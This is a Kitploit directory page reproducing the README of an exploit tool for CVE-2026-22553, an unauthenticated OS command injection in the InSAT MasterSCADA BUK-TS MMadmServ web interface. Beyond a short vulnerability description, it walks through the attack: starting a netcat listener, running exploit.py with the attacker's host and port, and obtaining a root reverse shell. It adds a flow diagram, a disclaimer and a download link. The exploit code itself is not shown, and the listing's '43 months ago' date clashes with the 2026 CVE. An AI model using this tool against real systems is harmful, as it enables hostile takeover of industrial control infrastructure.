Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — Unauthenticated OS command injection exploit for InSAT MasterSCADA BUK-TS MMadmServ web interface. Delivers reverse shell with root privileges via HTTP POST request. CVSS 9.8 critical. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Payload GenerationExploitationSCADA/ICS SecurityWeb Application ExploitationPenetration TestingCommand and Control
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Unauthenticated OS command injection exploit for InSAT MasterSCADA BUK-TS MMadmServ web interface. Delivers reverse shell with root privileges via HTTP POST request. CVSS 9.8 critical.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
43 months agoNot yet reviewed
Share

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - Unauthenticated RCE

CVE-2026-22553 | CVSS 9.8 Critical| Exploit Author Mohammed Idrees Banyamer


📝 Description

InSAT MasterSCADA BUK-TS suffers from an Unauthenticated OS Command Injection vulnerability in the MMadmServ web interface. This flaw allows remote attackers to achieve full remote code execution (RCE) without any authentication.

  • Affected Product: InSAT MasterSCADA BUK-TS (All versions)
  • Vulnerability Type: OS Command Injection (CWE-78)
  • Severity: Critical (CVSS v3.1 Score: 9.8)
  • Exploit Author: Mohammed Idrees Banyamer
  • Country: Jordan 🇯🇴

  • 🛠️ Attack Method Diagram

    root@kitploit:~
    flowchart TD
        A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
        B -->|Unauthenticated| C[Vulnerable Parameter]
        C -->|OS Command Injection| D[Command Execution on Target Server]
        D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
        
        style A fill:#ff4d4d,stroke:#fff
        style E fill:#4dff88,stroke:#fff

    🚀 Usage

    root@kitploit:~
    python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
    

    Example

    root@kitploit:~
    python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
    

    Options

    OptionDescription
    targetTarget URL (e.g. http://ip:port)
    --lhostYour IP address (reverse shell)
    --lportYour listening port

    📌 How to Use

    1. Start a listener on your machine:

      root@kitploit:~
      nc -lvnp 4444
      
    2. Run the exploit:

      root@kitploit:~
      python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
      
    3. Get a reverse shell with root/system privileges.


    ⚠️ Disclaimer

    This exploit is provided for educational and authorized penetration testing purposes only.
    Unauthorized use against systems you do not own is illegal and may violate international laws.
    The author is not responsible for any misuse.


    📬 Author

    Mohammed Idrees Banyamer

    • Instagram: @banyamer_security
    • GitHub: mbanyamer
    • Country: Jordan 🇯🇴

    Star ⭐ this repository if you found it useful!

    Download Tool